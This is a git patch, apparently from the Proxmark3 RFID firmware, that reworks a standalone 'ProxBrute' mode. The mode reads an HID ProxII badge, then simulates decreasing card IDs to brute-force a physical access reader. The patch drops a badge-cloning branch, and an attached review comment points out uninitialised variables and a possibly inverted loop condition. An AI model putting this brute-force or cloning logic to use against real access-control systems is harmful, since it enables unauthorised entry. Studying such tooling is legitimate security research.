From 871445212ec86dd83090897ca6f876c3bd1b0568 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Fri, 13 Sep 2019 14:10:08 +0200 Subject: [PATCH] chg 'lf proxebrute standalone' - simplified it. No need for clone, or multiple slots, LED A = read / record, flashing LED A 12 times, failed reader and next click try again, LED C == proxbrute, all leds flash when exiting standalone mode --- armsrc/Standalone/lf_proxbrute.c | 197 +++++++++++-------------------- 1 file changed, 68 insertions(+), 129 deletions(-) diff --git a/armsrc/Standalone/lf_proxbrute.c b/armsrc/Standalone/lf_proxbrute.c index 8044cbde9..5d435c3ee 100644 --- a/armsrc/Standalone/lf_proxbrute.c +++ b/armsrc/Standalone/lf_proxbrute.c @@ -18,8 +18,6 @@ #include "ticks.h" #include "lfops.h" -#define OPTS 2 - void ModInfo(void) { DbpString(" LF HID ProxII bruteforce - aka Proxbrute (Brad Antoniewicz)"); } 
@@ -30,151 +28,92 @@ void RunMod() { Dbprintf(">> LF HID proxII bruteforce a.k.a ProxBrute Started (Brad Antoniewicz) <<"); FpgaDownloadAndGo(FPGA_BITSTREAM_LF); - uint32_t high[OPTS], low[OPTS]; - int selected = 0; - int playing = 0; - int cardRead = 0; + uint32_t high, low; - // Turn on selected LED - LED(selected + 1, 0); +#define STATE_READ 0 +#define STATE_BRUTE 1 + + uint8_t state = STATE_READ; for (;;) { + WDT_HIT(); // exit from SamyRun, send a usbcommand. if (data_available()) break; - // Was our button held down or pressed? - int button_pressed = BUTTON_HELD(1000); - SpinDelay(300); + // Was our button held down or pressed? + int button_pressed = BUTTON_HELD(280); + if ( button_pressed != BUTTON_HOLD ) + continue; // Button was held for a second, begin recording - if (button_pressed > 0 && cardRead == 0) { - LEDsoff(); - LED(selected + 1, 0); - LED(LED_D, 0); + if ( state == STATE_READ ) { + + LEDsoff(); + LED_A_ON(); + WAIT_BUTTON_RELEASED(); - // record DbpString("[=] starting recording"); - // wait for button to be released - while (BUTTON_PRESS()) - WDT_HIT(); - /* need this delay to prevent catching some weird data */ - SpinDelay(500); + // findone, high, low, no ledcontrol (A) + CmdHIDdemodFSK(1, &high, &low, 0); - CmdHIDdemodFSK(1, &high[selected], &low[selected], 0); - Dbprintf("[=] recorded %x %x %08x", selected, high[selected], low[selected]); + Dbprintf("[=] recorded | %x%08x", high, low); - LEDsoff(); - LED(selected + 1, 0); - // Finished recording - // If we were previously playing, set playing off - // so next button push begins playing what we recorded - playing = 0; - cardRead = 1; - } else if (button_pressed > 0 && cardRead == 1) { - LEDsoff(); - LED(selected + 1, 0); - LED(LED_A, 0); - - // record - Dbprintf("[=] cloning %x %x %08x", selected, high[selected], low[selected]); - - // wait for button to be released - while (BUTTON_PRESS()) - WDT_HIT(); - - /* need this delay to prevent catching some weird data */ - SpinDelay(500); - - 
CopyHIDtoT55x7(0, high[selected], low[selected], 0); - Dbprintf("[=] cloned %x %x %08x", selected, high[selected], low[selected]); - - LEDsoff(); - LED(selected + 1, 0); - // Finished recording - - // If we were previously playing, set playing off - // so next button push begins playing what we recorded - playing = 0; - cardRead = 0; - } - - // Change where to record (or begin playing) - else if (button_pressed) { - // Next option if we were previously playing - if (playing) - selected = (selected + 1) % OPTS; - playing = !playing; - - LEDsoff(); - LED(selected + 1, 0); - - // Begin transmitting - if (playing) { - LED(LED_B, 0); - DbpString("[=] playing"); - // wait for button to be released - while (BUTTON_PRESS()) - WDT_HIT(); - - /* START PROXBRUTE */ - - /* - ProxBrute - brad a. - foundstone - - Following code is a trivial brute forcer once you read a valid tag - the idea is you get a valid tag, then just try and brute force to - another priv level. The problem is that it has no idea if the code - worked or not, so its a crap shoot. One option is to time how long - it takes to get a valid ID then start from scratch every time. 
- */ - if (selected == 1) { - DbpString("[=] entering ProxBrute Mode"); - Dbprintf("[=] current Tag: Selected = %x Facility = %08x ID = %08x", selected, high[selected], low[selected]); - LED(LED_A, 0); - LED(LED_C, 0); - for (uint16_t i = low[selected] - 1; i > 0; i--) { - if (BUTTON_PRESS()) { - DbpString("[-] told to stop"); - break; - } - - Dbprintf("[=] trying Facility = %08x ID %08x", high[selected], i); - CmdHIDsimTAGEx(high[selected], i, 0, 20000); - SpinDelay(500); - } - - } else { - DbpString("[=] RED is lit, not entering ProxBrute Mode"); - Dbprintf("[=] %x %x %x", selected, high[selected], low[selected]); - CmdHIDsimTAGEx(high[selected], low[selected], 0, 20000); - DbpString("[=] done playing"); - } - - /* END PROXBRUTE */ - - - if (BUTTON_HELD(1000) > 0) - goto out; - - /* We pressed a button so ignore it here with a delay */ - SpinDelay(300); - - // when done, we're done playing, move to next option - selected = (selected + 1) % OPTS; - playing = !playing; - LEDsoff(); - LED(selected + 1, 0); - } else { - while (BUTTON_PRESS()) - WDT_HIT(); + // got nothing. blink and loop. + if ( high == 0 && low == 0 ) { + SpinErr( LED_A, 100, 12); + DbpString("[=] only got zeros, retry recording after click"); + continue; } + + SpinErr(LED_A, 250, 2); + state = STATE_BRUTE; + continue; + + } else if ( state == STATE_BRUTE ) { + + LED_C_ON(); // Simulate + WAIT_BUTTON_RELEASED(); + + + /* + ProxBrute - brad a. - foundstone + + Following code is a trivial brute forcer once you read a valid tag + the idea is you get a valid tag, then just try and brute force to + another priv level. The problem is that it has no idea if the code + worked or not, so its a crap shoot. One option is to time how long + it takes to get a valid ID then start from scratch every time. 
+ */ + DbpString("[=] entering ProxBrute mode"); + Dbprintf("[=] simulating | %08x%08x", high, low); + + for (uint16_t i = low - 1; i > 0; i--) { + + if (data_available()) break; + + // Was our button held down or pressed? + int button_pressed = BUTTON_HELD(280); + if ( button_pressed != BUTTON_HOLD ) break; + + Dbprintf("[=] trying Facility = %08x ID %08x", high, i); + + // high, i, ledcontrol, timelimit 20000 + CmdHIDsimTAGEx(high, i, false, 20000); + + SpinDelay(100); + } + + state = STATE_READ; + SpinErr( (LED_A | LED_C ), 250, 2); + LEDsoff(); } } -out: - DbpString("[=] exiting"); + + SpinErr( (LED_A | LED_B | LED_C | LED_D), 250, 5); + DbpString("[=] You can take the shell back :) ..."); LEDsoff(); }
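Review bot: `high` and `low` are declared without initialisers (`uint32_t high, low;`) yet the new check `if ( high == 0 && low == 0 )` after `CmdHIDdemodFSK(1, &high, &low, 0)` is only meaningful if the demod call always writes both outputs; if it returns early (no tag, host data, button) the comparison reads indeterminate values, which is undefined behaviour and can silently skip the retry branch. Initialise them and reset before every capture: `uint32_t high = 0, low = 0;` at the declaration and `high = low = 0;` immediately before the `CmdHIDdemodFSK` call. In the STATE_BRUTE loop, `if ( button_pressed != BUTTON_HOLD ) break;` runs right after `WAIT_BUTTON_RELEASED()`, so if `BUTTON_HELD(280)` reports `BUTTON_HOLD` only while the button is physically down the loop ends on its first iteration; it reads like the old `if (BUTTON_PRESS()) break;` inverted, so confirm the intended condition against the button helper. Also `STATE_READ`/`STATE_BRUTE` are `#define`d inside the function body where macros do not obey block scope; `enum { STATE_READ, STATE_BRUTE };` would be the conventional, debugger-visible form.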